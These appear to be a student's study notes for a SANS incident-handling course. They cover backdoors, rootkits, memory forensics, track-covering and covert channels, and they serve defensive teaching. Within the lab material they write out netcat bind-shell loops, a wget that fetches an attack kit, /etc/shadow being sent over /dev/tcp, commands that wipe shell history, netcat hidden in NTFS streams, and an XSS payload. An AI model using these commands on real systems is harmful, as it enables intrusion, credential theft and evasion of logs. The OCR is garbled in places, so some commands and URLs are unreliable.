- # while [ 1 ]; do echo “Started”; no —lnp [port] —e /bin/sh; done

• To compile and run exploit code
- $ gcc <exploit source> -o <outfile>
- $ ./<outfile>
• What user am I in Linux?
$ whoami
$ id
• Become root if you have the password
$ su -

Vi Editor:
• To open or create a new file
# vim <file>
• Once in a file, to enable editing
— Press ‘a’
• When done editing
- Press ‘esc’ then ‘:‘ then ‘wq!’

• To hide data
# echo “Hello there.” > hideme.txt
- # ./hydan ./ls hideme.txt > <outfile>

• To retrieve data
- # ./hydan-decode <stegofile>
• Enter password when prompted

Hydan is in:

Cross-Site Scripting Example:
• To display an alert (example)
- http: //<SCRIPT LANGUAGE=Javascript>alert(“You are vulnerable to cross-site scripting! “);</SCRIPT>
• Script to steal cookies from a victim (example)



5) 504.5 - Computer & Network Hacker Exploits, Part 4 quick notes

504.5 - Computer & Network Hacker Exploits, Part 4

1. App-Level Trojan Horse backdoor Suites
- allow for the complete control of a victim system remotely across the network.
- client-server architecture.
- very popular and many examples:
Poison Ivy, VNC (, Dameware (commercial), Sub7, Lots of others such as BlackShades and GhostRAT.

- attackers can trick victim into running tool.
- or attackers can install it themselves.
- payload option in Metasploit.

Don't fall for Scareware that your system is compromised!

wrappers and Packers:
- wrap a backdoor tool around some other application.
- create a Trojan Horse executable.
• Also known as “Binders”
• Example: Wrap nc.exe into an interactive birthday card
• Built into many backdoors (i.e., Poison Ivy)
• Metasploit msfvenom
• Can wrap into .VBS or NBA for macros in Word and Excel with exe2vba.rb and exe2vbs.rb
- The Veil toolkit uses some of these techniques to bypass AV!!!!
- SET’s default payload generation also does this

Windows anti-reverse engineering for Executables:
- For thwarting Windows reverse engineering of malicious code, attackers frequently use packers.
- Originally focused merely on compression of executables
• But, limits string searches and direct disassembly
— Gives attacker more obscurity

Dozens of different packing algorithms and tools
UPX is the most popular, available at
Many more listed at
Commercial ones as well (Thinstall, PECompact, PEBundle, etc.)

Defense: Unpacking Windows Executables
• To thwart these, researchers use unpackers
— Or, use a plug-in for a debugger
• Ollydbg — Very popular free Windows debugger
• Dozens of unpacking scripts run as plug-ins for Ollydbg at:
— That whole site ( contains amazingly helpful stuff for reverse engineering malware!
• If a custom packing/obscuring algorithm is used, the researcher might need to create a custom unpacker using code from the malware specimen under analysis; this could take a lot of time.

- Immunity Debugger - very popular free Windows debugger.

5.3 Memory Analysis:

Investigators can use several tools to analyze memory dumps from Windows machines to determine attackers’ actions, such as executing malicious
application-level Trojan Horse backdoors.
• First, you’ll need a memory dump
— Can be generated using a variety of utilities, including Mandiant’s Memoryze MemoryDD.bat, HBGary’s fastdump, Matthieu Suich's win32dd, winpmem, and ManTech’s mdd

• Volatile Systems’ Volatility framework
- Free, open source, very feature rich and useful
— A modular tool written in Python

Google’s Rekall
— Free
- We focus on Rekall for analysis


• Some important Rekall modules include:
- imageinfo: Shows the date and time the memory dump was captured
— netstat: Lists open sockets (PID, Port, Protocol, and when it was opened)
— pstree: See a full process tree for a memory image
— pslist: Lists running processes (PID, name, and Parent PID)
— dillist: Lists the DLLs loaded by a process, as well as the command-line invocation of a process
— netstat: Shows all active listening UDP and TCP ports and connections
— ifiescan: Lists the files that each process had open
— pedump: Dumps code associated with running process into executable file
— modules: Lists loaded modules from the dump, including drivers and SYS files

• Numerous other modules as well, included with Rekall, and available as

Numerous other modules are available for download and most of them are listed at the URL on the slide separate downloads:

sec504@slingshot:~$source /home/tools/rekall/bin/activate

$rekal -f /home/tools/504_memory_ex/memimage.dd

Rekal: Viewing Network Connections:
- using Rekall's 'netstat' module, we can display a list of active network connections at the time the memory dump was acquired:

• Using Rekall’s “netstat” module, we can display a list of active network connections at the time the memoiy dump was acquired:
[1] memimaqe.dd hh:mm:ss> netstat
• Output is similar to the following command on a live Windows machine:
C:\> netstat —nao | find “ESTABLISHED”

Viewing Processes:
• Rekall’s “pslist” module displays a list of running processes at the time the image was acquired
[1] memimagedd hh:mm:ss> pslist

• Output is similar to the following command on a live Windows machine:
C:\> wmic process get name, parentprocessid, processid

Rekall: DLLs and Command Line
Use Rekall’s “dilhist” module to display a list of DLLs loaded by a process, as well as the commandline invocation of a running process:
[1] memimage.dd hh:mm:ss> dlllist pid=[pid_num]

Output is similar to the following commands on a live Windows machine:
:\> tasklist /m /fi “pid eq [pid]”
C:\> wmic process where processid=[pid] get commandline

c:\nc.exe -n 6000 -e c:\ncrelay.bat

For the list of DLLs loaded by every running process, we can use the following:
C:\> tasklist /m
For the list of DLLs loaded by a specific process, we can execute the following:
C:\> tasklist /m /fi “pid eq [pid]”

Lab: Windows Attack:

Using Rekall to analyze the image in /home/tools/504_memory_ex/memimage.dd, determine what the attacker was doing on the compromised system by answering the following questions:
1. Which processes are communicating with other machines on the network?
2. Which processes did the attacker likely run?
3. Is the attacker using the machine to pivot, and if so, how, and to which other systems is he/she pivoting?
4. Which suspicious process seems to be the root of all other suspicious activity on the compromised system?
5. Which builtin windows commands would you use if you were doing the same analysis on a live Windows system instead of a memory dump file?

:Hint: first Populate This Connection Table - Lab: Windows Attack
As a hint, you might find it useful to start by populating the Connection Table provided in the slide. When
this table is filled, you will have answered Question I and significantly started Question 2.
PID     PPID     Name         Remote IP         Remote Port

(for the table above)
- use Rekall's 'netstat' module.
- or in Windows:
c:\>netstat -nao | find "Established"

- get the parent process ID in Rekall:
or Windows:
c:\>wmic process get name, parentprocessid, processid

Another Hint: Then Populate this process table
PID     PPID         Name                 Command-Line Invocation

Start by copying over the information for processes you have on the Connection Table, and then use Rekall to analyze processes and fill in the blanks, especially the PPID and Command-Line Invocation fields.
You should also look for other, related processes the attacker might have invoked.
Pay special attention to process relationships indicated by the Parent Process ID (PPID).

Identify Processes by Connection (I):

- Determine which processes are communicating on the network using the Rekall “netstat” module
- Use the Rekall “pslist" module to cross ..reference the PIDs associated with established network connections with the list of running processes to
determine the name of each process associated with each connection.
- Also record the Parent PID of each process, because you’ll need it soon (PPID is the fourth column of Rekall process output)

Also run the below in Windows:
C:\> wmic process get name ,parentprocessid,processid

Determine Command-Line Invocations:

• Next, we have to dive deeper and determine each process’s command-line invocation using RekaWs “dlllhist” module, paying particular attention to the Netcat instances
• For each process in our table, run:
[1] memimage.dd hh:mm:ss> dlllist pid=[pid_num]

>dlllist pid=1744

For Question 5, the rough equivalent of this command on a live Windows machine is:
C:\> wmic process where processid=[pid] get commandline
C:\> tasklist /m /fi “pid eq [pid]”

On a live Windows machine, the commands you’d use to pull this same kind of information are:
C:\> wmic process where processid=1896 get name, parentprocessid,processid

Or, if you want to more closely mimic the Rekall command used with Linux grep, you could run:
C:\> wmic process get name,parentprocessid,processid | find “2124”

And, to get the command-line invocation information, you could run:
C:\> wmic process where processid=2124 get commandline

cmd.exe /c for /L %i in (1,1,255) do @ping -n 1 192.168.49.%i

(1,1,255) means Start with 1, step 1, up to 255.

Process Map:
2516 (explorer.exe)
3600 (hot_pics.exe)--------------> 1428(metsvc.exe) -----> 496(services.exe)
|          |    |                        |
v          |    v                        v
1744(nc.exe)  |    408(nc.exe)                    1428(metsvc.exe)
          v                            |
         2132(cmd.exe)                    v


R00tKit techniques:
• Rootkits are a collection of tools that allow an attacker to:
— Keep backdoor access into a system
- Mask the fact that the system is compromised

• These goals are accomplished by altering the operating system itself
• With these capabilities, rootkits are classic examples of Trojan Horse software and very effective backdoors

• Components of rootkits have been discovered for other systems
— Several UNIX/Linux rootkits at
• Solaris, B$D, AIX, HP-UX, IRIX
— Numerous Windows rootkits used by cyber criminals are also available
— Mobile rootkits are just now getting traction
• Rootkits are increasingly being bundled with spyware and bots

Windows User-Mode Rootkit DLL Injection and API Hooking:
• EXEs and DLLs are commonly used methods for packaging code in Windows
— EXEs run, and utilize shared DLLS to get stuff done
• On Windows, anyone with the Debug right can inject a DLL into a running process ...
• ... and start it running by creating a thread in the target process.
• Hook APIs to change programs’ views of running processes, open ports, and the file system.

— Don’t let attacker get root in the first place
- Harden and patch the system thoroughly.

— Detection can be quite difficult, but some methods are available
• ls versus “echo *“. Output should include the same files
• Nice, but not terribly practical
• There are other ways we can catch the system telling a lie, which we cover after the kernelmode rootkit discussion

• Most rootkits do not store the password as a string, so “strings” on /bin/login will not work
• Analysis of /bin/login by automated tool to look for embedded password

— Analyze other systems’ changes made by discovered rootkits
• Eradication
— Wipe drive, and then reformat drive
— Reinstall operating system, applications, and data
— Make sure you apply all patches
— You should change all admin/root passwords on victim and related
• Recovery
- Monitor system very carefully

Kernel-Mode Rookits:
• Kernel-mode rootkits are a big area of focus
• By operating in the kernel, the allacker has
complete control of the target machine
— Hidden processes
— Hidden files
— Hidden network use (sniffing and port listeners)
- Execution redirection

In general, there are (currently) five different methods for manipulating the kernel being publicly discussed
1. Loadable kernel modules (UNIX) and device drivers (Windows) --> (the most popular method today)
2. Altering kernel in memory
3. Changing kernel file on hard drive
4. Virtualizing the system
• Each available on Linux and Windows

Method 3) Changing Kernel File on Hard Drive
• Instead of altering live kernel in memory, attackers could overwrite kernel file on the hard drive
• On Linux, the file is vmlinuz
— Whitepaper on this technique at
• On Windows, kernel functionality is in ntoskrnl.exe and win32k.sys files
— Attacker must foil NTLDR integrity checks of these files
— Disable them or...
— Make them lie (alter their code)
— Bolzano and FunLove viruses did this in 1999, but nothing much since then.

Virtualizing the System:
Dino A. Dai Zovi is working on a similar hardware-based rootkit called Vitriol for Intel VT-x technology

Rootkit Examples:

• By TurboBorland
— Of Chaotic Security
• Works on 2.6+ and 3.0+ Linux kernels
• 32- and 64-bit support
• Uses driver support/loadable kernel modules
• Like many rootkits, it uses insmod to insert the various rootkit components
• Hides by modifying the results listed by lsmod
• Modifies the System Call Table
• Real-time hiding from strace
- very scary.

Avatar ROotkit:
• Uses driver infection technique twice
— Once to bypass Host Based Intrusion Detection (HIDS)
— The second is for persistence
• Uses the bootkit method of infection and persistence to bypass driver signing requirements
• An interesting mixture of user-mode and kernel-mode techniques
• Attempts to detect whether the target system is a VM
• If not installed as Admin, it will automatically attempt local privilege escalation
• Infects a random driver from a list
— Does not infect the same driver for every system
• It is able to infect system drivers without altering their size
• Custom encryption used for Command and Control (C2)

You can find it here:

Alureon/TDL Rootkit Family:
Alureon is one of the most powerful rootkits in widespread use for Windows today
— Used to hide spyware, bots, and other maiware
— Original version called “TDSS”.,, then TDL1 followed by TDL2... and now Alureon — an iterative loop growing more powerful

• Kernel-mode rootkit
— Configuration file and some DLLS present in user mode, but hidden
• Focus is on file hiding and dodging antivirus and rootkit detection tools
• For installation, Alureon alters Windows device drivers associated with the file system
— atapi.sys or iastor.sys
- Alters driver, but changes system so that driver signature check always passes.

FOntanini Rootkit (By Matias Fontanini).

Kernel-Mode Rootkit Defenses - Configuration Lockdown
• All of these attacks require the bad guy to have superuser privileges (root or Administrator)
• Harden the box by hand, or.
• Use a good security template
• The Center for Internet Security (CIS), in conjunction with NSA, NIST, and others, has developed a set of templates for Win, Lin, Solaris, HP-UX, Cisco Routers, and Oracle DBs
• They have scoring tools as well.

Defenses — LinwdUNIX Rootkit Detection Tools
• Try to catch inconsistencies introduced by a roothit on a system
• Chkrootldt, free from
— Checks for over 50 different rootkits, both user mode and kernel mode
— Runs on Linux. freeBSD, OpenBSD. NetBSD, Solaris, HP-UX, True64, and BSDI
— Numerous tests:
• Look for alterations in binaries and check promiscuous mode
• Check link count — each directorvs link count should equal two plus the number of directories contained
inside — some rootkits mess this up
• Rootkit Hunter, free at http ://
— Looks for 55 rootkits, both user mode and kernel mode
— Runs on Linux, FreeBSD, OpenBSD, AIX, and Solaris
— Also several tests, including rnd5 hashes of known evil binaries, comparison of ps process list
vs. /proc, and default rootkit files
• OSSEC includes ‘tRootcheck” with similar features at www,

Additional Windows RootKit Detectors
- other tools use similar techniques to the rootkit Revealer
- Sophos Anti-RootKit
- McAfee RootKit Detective
- RootKit REvealer, by Mark Russinovich

It's always nice to have a second (and third) opinion!

Defenses: File Integrity Checking Tools
• Look for changes to critical system files
• File integrity checking tools help
— Although a well-designed kernel-mode rootkit can trick the file integrity checker using execution redirection
— Still, if the attacker makes any unmasked changes, you’ll spot him
• Tripwire is a classic
— Also looks for registry modifications
• OSSEC is also very good
- Runs on Linux, UNIX, Mac OS X, and Windows
— Freely available at
• Other tools include:
— Ionx Data Sentinel

Network Intelligence/Forensics:
• A lot of rnalware tries hard to hide on the end system
— Morphing and kernel hacking
• ... but its use and propagation have definite patterns that can be observed on the network
— Strange communication pairs (scans, client - >client, server-> server, server ->client?)
— Security Onion is an outstanding Network Forensic Distro Network-level intelligence and forensics can help detect such behavior early

Get the Security Onion now:

Nifty auto-detection and throttling via network-based IPS:
- NetWitness, fireEye, Sourcefire, TippingPoint, ForeScout, etc.

Kernel-Mode Rootkit Defenses: Contain, Erad, and Recov
• The containment, eradication, and recovery steps for kernel-mode rootkits involve the same techniques used for user-mode rootkits
— Containment
• Analyze other systems’ changes made by discovered rootkits
• Wipe drive, and then reformat drive
• Reinstall operating system, applications, and data
• Make sure you apply all patches
• You should change all admin/root passwords on victim and related systems
— Recovery
• Monitor system very carefully

RITA - finding bads things on your network using Free and Open Source tools!
(from BlackHillsInfoSec company).


5.5 Covering Tracks in Linux and Unix:

Hiding Files in UNIX
• The easiest (and very effective) way to hide files is to simply name them something like ”.“ or ”..”
— Note: There is a space after those dots
• Or, just name a file “...“ or even ” “(that’s a space!)
• For example:
# ls -a
. .. test.txt files
# echo hideme > “.."
# ls —a
. .. .. test.txt files
Of course, you can do nastier stuff using rootkits.

Where Attackers Put Hidden UNIX files and Dirs
• In addition to using dot names, attackers want to put files in a place where they won’t be noticed
• Popular locations for hidden stuff include:
— /dev
— /tmp
— /etc
— Other complex components of the file system
• /usr/local/man
• /usr/src
• Numerous others

Log Editing:
Editing UNIX log files

• Main log files can be found by viewing /etc/syslog.conf
— Attacker might check this to find out where the logs are located
— Or just run a script that guesses where the logs are
• Of particular interest in Linux are:
— /var/log/secure
— /var/log/messages
— Logs of particular service that were exploited to gain access, such as:
• /var/1og/httpd/errorjog
• /var/log/httpd/aceessJog
• These log files (usually in /var/log) are written in ASCII
• They are often edited by hand using a text editor or script
— If the log file is very large, they usually use a perl script to edit it

# find .  -name \*.log
# find .  -name \*.log -ls | sort -r -n -k7
# grep this_word this_file.txt

Don't forget Shell History:
Attackers also delete or edit their shell history files
— A list of the most recent N commands
• 500 by default in bash, although 1000 on some Linux distros
— ~/.bash_history, for example
— Written in ASCII, and can be edited by hand with the permissions of the user or root
— Attackers remove suspicious commands
— Some even add commands to implicate some other user in the attack (divert attention)
- The default history file size is 500 commands in bash, although some Linux distros increase this to 1000 (including RedHat).

Editing Shell History - A Problem:
• Shell history is written when the shell is exited
• When editing shell history, the command used to invoke the editor will be placed in the shell history file
• The attacker could edit the file, exit the shell, start another shell, edit the history file again to remove it
...but it will be added again!
— A chicken and the egg problem
• Solutions
1)Kill the shell, so that it cannot write the most recent shell history, including the command used to edit it
# kill -9 [pid] ...or...   #killall -9 bash

2) Change the environment variable HISTSIZE (for bash) to zero
# unset HISTFILE then kill -9 $$

Account Entries in UNIX editing:
• utmp: file contains info about currently logged in users
— Default location on Linux: /var/run/utmp
• wtmp: File contains data about past user logins
- Default location on Linux: /var/log/wtmp
• btmp: File contains bad login entries for failed login attempts
— Default location on Linux: /var/log/btmp, but often not used
• lastlog: File shows login name, port, and last login time for each user
— Default location on Linux: /var/log/lastlog

• utmp, wtmp, and btmp are not stored in ASCII
— They are stored as utmp structures
• lastlog stored in different manners on various systems
• They can be edited only using specialized tools:
— remove.c, by Simple Nomad
• Removes entries from utmp, wtmp, and lastlog
— Numerous others, including wtmped.c, marry.c, cloak.c, logwedit.c, wzap.c, etc.
— All available at

Lab: Shell History Analysis

Analyzing a Shell History File:
• On the course U$B, there is a .bash_history file located in the Linux directory from the root account of a compromised system
• It’s also located inside the Linux VMware image, at /home/tools/history_exercise/.bash_history

In this lab, we will:
— Open this history file in an editor
— Analyze its contents to determine the attacker’s actions on the machine
— If you have trouble interpreting the attacker’s tactics, feel free to replicate them on your own Linux VMware system to get a better feel for the attacker’s actions.

Initial Action on the System:
• Open the histoiy file:
$ gedit /home/tools/history_exercise/.bash history
• When the attacker first gets access to the root account, he runs the following commands:
unname -a
uname -a
• What is the purpose of each command?
— Some possible answers follow this section
— Try to answer each question first, and review your answers at the end

File System Interactions:
• Next, the attacker executes the following commands:
mkdir /etc/initd
cd /etc/initd
wget 1O.1O.1O.18/kit.tgz
tar xfvz kit.tgz
my nc init
• What is the purpose of each command?

Launching Processes (I):
• Now, the allacker gets more serious:
echo “while :; do echo “Started”; /etc/initd/init —l —p 8080 —e /bin/sh; done” > init.conf
nohup init.conf &
nohup ./init.conf &
chmod 555 init.conf
nohup ./init.conf &
lsof -Pi | grep 8080
• What is the purpose of each command?

Launching Processes (2):
• finally, the attacker accesses some important files and another system:
cat /etc/passwd > /dev/tcp/
cat /etc/shadow > /dev/tcp/1O.1O.1O.18/443
./tcpdump -n -s0 -w init.out port 80 &
vi /var/log/messages
netstat —nat
ssh tom@1O.11.12.15

• What is the purpose of each command?

REMEMBER: turn on time stamping in Linux and MAC for when you check the logs!

Lab: Shell History
Some Additional Questions
• Was the attacker a human or a script?
• What specific files should the investigator look for?
• What other systems has the attacker likely compromised?

Potential Answers (1)
— Checking to see which account the attacker has gained control of on the machine
— Verifying the privileges of the current account
unname —a
— Trying to check the kernel version of the system, but with a typo in the command
uname —a
- Re-running the command, but without the typo
- checking to see whether Netcat is installed.

Potential Answers (2)
mkdir /etc/initd
— Making a directory that will blend in
cd /etc/initd
- Moving into that directory as a base of operations
wget 1O.1O.1O.18/kit.tgz
— Puffing down a package from$, likely another compromised machine
tar xfvz kit.tgz
— Opening the contents of the kit
mv nc init
- The kit must have included Netcat, which the attacker renames “init” to camouflage it.

Potential Answers (3)
echo “while :; do echo Started; /etc/initd/init —l —p 8080 -e /bin/sh; done" > init.conf
— Putting an autostart loop together for netcat listener
nohup init.conf &
— Attempting to run the loop with nohup to survive logoff ... forgot to specify the path
nohup ./init.conf &
— Now, attacker specifies path, but script isn’t executable
chmod 555 init.conf
- changing permissions to read-execute
nohup ./init.conf &
- finally running backdoor while loop
lsof -Pi | grep 8080
- verifying backdoor listener on TCP port 8080

Potential Answers (4)
cat /etc/passwd > /dev/tcp/1O.1O.1O.18/443
cat /etc/shadow > /dev/tcp/1O.1O.1O.18/443
— Exfiltrating /etc/passwd and /etc/shadow using /dev/tcp
./tcpdump -n -s0 -w init.out port 80 &
— Running tcpdump to grab traffic to and from port 80 into file called “init.out,” with a snaplength of zero to ensure full packet contents are stored
vi /var/log/messages
— Editing the logs
netstat —nat
— Where do we have current TCP connections?
ssh tom@
— Connecting to via ssh
— Ending the session

Some Additional Answers
• Was the attacker a human or a script?
— Likely a human, due to the typos and corrections entered in real-time.
• What specific files should the investigator look for?
— kit.tgz, init, init.conf, and init.out
• What other systems has the attacker likely compromised?
— — hosting the kit.tgz file, and the place where /etc/passwd and /etc/shadow were sent
— Possibly, as tom account

5.6 Covering Tracks in Windows:

Hiding Files in NTFS
If system is running NTFS, alternate data streams are supported
• Multiple streams can be attached to each file or directory
• Attacker’s files can be hidden in a stream behind normal files on the system
— Such as notepad.exe or word.exe (or anything else!)

Use the type command built into Windows
C: \> type hackstuff.exe > notepad.exe:stream1.exe
Or, use the cp program from the NT Resource Kit
C: \> cp hackstuff.exe notepad.exe:stream1.exe

• To get data back, it can be copied out of the stream
C: \> cp notepad.exe:stream1.exe hackstuff.exe
• Alternatively, you can create an alternate data stream attached to a directory by simply typing:
C: \> notepad <file_or_directory name>:<stream name>
If you know a stream exists and you know its name, you can view its contents using the more command:
C:\> more < c:\file:stream1

Alternate Data Streams in NTFS:
• The hidden file in the stream will follow the other file around through normal copying between NTFS partitions
• On Linux machines that have connected to a Windows box with NTFS, smbclient can get data from ADSs
• But, Windows machines prior to Vista and 2008 Server offer no built-in capability for finding or deleting a stream
— To delete a stream, you could move the file to FAT partition, and then move it back
— On Vista, Win2008, and Windows 7, the dir command offers the /r option for listing ADSs:
C:\> dir /r
• Will not show ADS behind Windows reserved filenames
— COM1, COM2, LPT1, AUX, etc.

Finding Hidden Streams:
Use antivirus tool to find malicious code in streams (nearly all have it)
• Many anti-spyware tools lack ADS detection functionality
• Third-party tools for finding alternate data streams in NTFS
— LADS by frank Hevne, at
— Streams at
• Includes an option for deleting a stream — very useful feature!

Lab: Alternate Data Streams:

• Boot your Windows machine
• Make a directory named c:\tmp (if it already exists, thaf S fine!)
C:\> mkdir c:\tmp
• Now, make a file in the directory:
C:\> notepad c:\tmp\test.txt
• Save some text in there, such as “hello!”
• Let’s create an alternate data stream associated with the directory c:\tmp
C:\> notepad c:\tmp\test.txt:hideme.txt

• Enter text (such as “This is hidden!”), save it, and close the file.

Looking for Alternate Data Streams:
• Let’s look for the alternate data stream
C:\> dir c:\tmp
• Do you see it?
• Bring up Windows file Explorer
— Start -> Run... type explorer.exe
— Then, look at c:\tmp and c:\tmp\test.txt
— Do you see hideme.txt?
• Now, bring up the file again... you must type the full path!
C: \> notepad C:\tmp\test.txt:hideme. txt
• It’s still there!

Executable in Alternate Data Streams:
• Let’s move a copy of Netcat into an alternate data stream
C:\> type c:\tools\nc.exe > c:\tmp\test.txt:nc.exe
— You must type in the full path, starting at c:\!!!
— You can look for this file, as we did previously...
• Let’s run this copy of Netcat

— If you have Windows Vista, 7, or 2008 Server:
C:\> wmic process call create c:\tmp\test.txt:nc.exe

— If you have Windows XP or 2003:
C:\> start c:\tmp\test.txt:nc.exe
— You must do this at the command prompt! Not at the Start - Run...Taskbar

• Now, type a Netcat command line, and you are rolling!
• Bring up the Task Manager (CTRL—ALT-DEL)
• What does the Netcat listener look like in the Process tab?

Using LADS:
• Now, let’s look for the alternate data stream using LADS
• Install LADS from the course USB
• Put it in the c:\tools\lads directory
• Now, let’s look for some ADSs:
C:\> c:\tools\lads\lads /S c:\tmp

• If you are on Windows Vista, 7, or 200$ Server, try running “dir /r /s c:\tmp”
• Do you see the hidden stuff?

Let's Clean UP:
• We should remove all of the alternate data streams we created.
• To do this, delete the c:\tmp directory:
C:\> del c:\tmp
C:\> rmdir c:\tmp
• Or, just drag the directory to the recycle bin to dispose of it.

Log Editing in Windows:
• In Windows, by default, event logs are stored in C: \Windows\$ystem32\winevt\Logs
• The main event log files are:
— AppEvent.Evtx — Application-oriented events
- SecEvent.Evtx — Security events
— SysEvent.Evtx — System events (readable by all users)
• Like UNIX’s wtmp and utmp, these files are stored with a bunch of binary information and are not directly editable
— In fact, the files are write-locked on a running Windows system
• An attacker with Admin privileges can clear the log files
— Use the Event Viewer, or simply delete the file
— An all-or-nothing proposition
• An attacker can generate so many bogus, benign logs that circular log files wrap, overwriting the important events
— Not overly practical, and likely to be noticed

Editing Logs with Physical Access:
• With physical access, an attacker could boot to Linux and edit the Windows logs directly with a specialized tool
• A Linux boot disk for editing the Windows password database (SAM) can be found at hllp://
— Be careful when using this on a machine with the Encrypting file System (EFS) on Windows XP and 2003
— You will likely lose the EfS keys if you change the password on them
• This program cannot be used to edit logs.
- ...However it illustrates that similar techniques could be used against the event logs.

Meterpreter Log File Alterations:
• The Metasploit Meterpreter also includes a log wiping utility
— “clearev” command
— Clears all events from the Application, System, and
Security logs
• No option to specify a particular type of log or event to wipe
• Currently, it clears the event logs completely, but could be expanded in the future to line-by-line event log editing.

Defenses from Covering Tracks on Systems (I):
— Use a separate server for logging
• In UNIX, syslog to a separate server
• Windows also supports syslog, through the use of third-party tools
Evt2sys at
>> Free, small, liglthveight tool that runs on Windows, reads event logs, and forwards them to syslog server
>> Win2K, Win2003, Win 7, and Win2008 and more supported 32-bit and 64-hit versions available
SL4NT at
>> Freefor6o days

Kiwi’s syslog at
>> Free as a running application, commercial if run as a service
Snare Agent and Log Server at
>> Windows of all kinds
>> Commercial

• User Behavioral Analytics
• Microsoft Advance Threat Analytics
• Rapid7 User Behavioral Analytics
• Exabeam

Defenses from Covering Tracks on Systems (2):

• Preparation
— Cryptographic integrity checks of log files
• Msyslog from Core Labs
( includes remote syslog and integrity-checking capabilities
• Identification
— Lookfor gaps in logs
— Look for corrupt logs
• Cont, Erad, Recov: N/A

5.7 Covering Tracks on the Network:
Tunneling and Covert Channels

• You can carry any protocol on top of any other protocol
• First protocol is encapsulated inside packets for second protocol
— Network sees only second protocol

• Example:
— X Windows over SSH
— IP inside IP
— IP over CP (the Avian Transport Protocol!)
• RFCs 1149 and 2549

Reverse HTTP Shells:

• Will work through web proxies
- Uses HTP GET command
— Even supports authenticating through a web proxy with static password!

ICMP Tunnels:
Covering the Tracks on the NetworlclCMPTunnels
• Numerous tools early data inside the payloads of ICMP packets
- Ptunnel (TCP over ICMP Echo and Reply), Loki (Linux shell), ICMPSheU (Linux), PingChat (Windows chat program), ICMPCmd (Windows cmd.exe access), and more
• Let’s focus on Ptunnel
— Written by Daniel Stodle, available at http://www.cs.uitno/—’daniels/PingTunnel/
— Runs on Linux or Windows
— Carries TCP connections inside ICMP Echo and ICMP Echo Reply packets
— Author talks about using it “for those times when everything else is blocked”

Ptunnel Features:

• Attacker configures Ptunnel client to listen on a TCP port, from which it grabs data and forwards to the Ptunnel Proxy
• Attacker also configures Ptunnel client with an ultimate destination IP address
• Client program on attacker’s machine makes a TCP connection to the chosen port on locaihost, Ptunnel client sends packets to Pthnnel proxy in ICMP payloads, and Ptunnel proxy dc-encapsulates TCP and forwards connection
• MD5-based challenge/response authentication between client and proxy
• Currently, no encryption between client and proxy

• Ptunnel consists of two components: the Ptunnel client and the Ptunnel proxy.

1) Ping request with TCP packet in payload.
2) Rng reply with TCP response
3) PTunnel Client received the response
4) TCP Connection to PTunnel Proxy Established over any TCP ports on the Internet.

Ptunnel consists of two components: the Ptunnel client and the Ptunnel proxy. The attacker configures the Ptunnel client to listen on a given TCP port on the localhost interface of the client machine. In addition, the attacker must configure the Ptunnel proxy, which runs on an external machine, accessible via ping packets from the Ptunnel client.
Finally, the attacker configures the Ptunnel client with a given ultimate destination address. That destination machine can provide any TCP-based service, including HTTP or Secure Shell. Note that the Ptunnel client software is configured with this destination address, which it tells to the Ptunnel proxy for each packet that it sends.
The attacker then runs some TCP-based client program on the attacker’s machine, directing it to connect to the localhost interface on the TCP port where the Ptunnel client is listening. The Ptunnel client takes the TCP packets, encapsulates them in ICMP Echo packets, and forwards the resulting packets to the Ptunnel proxy.
From a network perspective, only ping packets (with the TCP packet as the payload) are being sent. The Ptunnel proxy then de-encapsulates the TCP packet and forwards it to its ultimate destination simply using TCP. Likewise, the Ptunnel proxy encapsulates any responses that come back from that destination into ICMP Echo Reply packets, forwarding them back to the client.
The Ptunnel proxy can be configured to authenticate the Ptunnel client, using an MD5-based challenge/response authentication algorithm. Currently, Ptunnel does not support encryption. However, if the application using the TCP-based connection encrypts the data (such as HTTPS or SSH), the attacker would have some degree of protection of the data.

Covert Channels in TCP and IP Headers:

- why not just create a covert channel using extra space in the TCP or IP header?
- Covert_TCP is one tool that implements a covert channel using either the TCP or IP header.

Extending the Ideas of Covert_TCP:
• Transfer Trojan Horse backdoor commands or shell instead ofjust files
• Bi-direcfional bounce attack
• Use other fields in the TCP, IP, and ICMP headers
— Reserved space
— IP options
— ICMP message type

Other Covert Channels:
• Just about any protocol can be used as a covert channel
— DNSCat2 by Ron Bowes and numerous other maiware specimens
• Quick UDP Internet Connection (QUICK)
— Use of multiplexed UDP connections for connections
• Stream Control Transmission Protocol (SCTP)
— Also uses multi-streaming to send data across multiple concurrent connections
— Supports multihoming so multiple endpoints can be used as failover
— Yeah, this means it has built-in C2 server failover
• The goal of attackers using odd protocols for transfer is to find new areas where existing signatures do not exist
• Also, there are some issues with reassembly across multiple concurrent streams of data being sent.

Full C2 backdoor where all Command and Control traffic flows over Gmail.
• Originally created by Ben Donnelly of BHIS
• Currently maintained by byt3bl33d3r
• Supports:
— Command execution
— Screenshots
— Download and upload of files
— Keylogging
- Execution of sheilcode
• Bypasses many DLP/ID$/IPS systems
• Many IDS/IPS/Firewalls are not monitoring Gmail traffic very well

Covert Channel Defenses (I):
• Preparation
— Keep attackers off system in the first place
• Identification
— Know what processes should be running on your systems
• When a strange process starts running, investigate
• Especially if it has admin/root privileges
— Network-based IDS can analyze packets for:
• Shell commands in HTTP (for reverse www shell)
• Unusual data in ICMP messages (for ICMP tunnels)
— false positives associated with network management equipment
• Unusual changes in IP ID and Seq/Ack fields (for Covert_TCP) — pretty hard to do.

Lab: Covert Channels:

Plain Sight Covert Channels
• Not all backdoors use plaintext to transmit data
• Many use other protocols
— HTfP8
• Others hide in plain sight
— For example, HTTP

• Every custom web application has data and fields that are encoded and transmitted differently
- For example, session parameters, hidden form elements, etc.
• It is almost impossible for full inspection of all these different variables
• Let’s take a look at a backdoor that uses this technique
• It also beacons at 30-second intervals
- a very common technique for modern malware.

VSAgent (I):
• Custom backdoor written by the Black Hills Information Security team
— Special 504 version wntten by Luke Baggett
• Encodes all Command and Control (C2) in base64
• Then, inserls it into a WEW$TATE parameter
• The encoded data is sent in the clear
• Very difficult to detect

If, for any reason, you need to remove results from a previous session please feel free to run the following command and restart vsagent:
#rm /opt/course_www/SEC5O4/vsagent-504/data.db

VSAgent (II):
rootslingshot# python /home/sec56e/CourseFiles/vsagent-504/ http://127.O.,O.1/SEC5O4/vsagent—504/vssvc.php

Open another prompt and
sec504@slingshot:~$ firefox

Now, we will use Firefox to connect to the web UI for VSAgent.

#tcpdump -i lo -s0 -A host | grep VIEWSTATE

Lab: Covert Channels
• Run some commands and decode the data
• Hints:
— The data is base64 encoded
— There are characters that are hex-encoded characters (Le., linefeed, =, etc.). which can pollute the decoding of the base64 data
• The offending characters will need to be removed or converted!
• awk gsub is your friend!
— $ echo cat dog dog | awk ‘{gsub(/cat/,”dog”)}1’
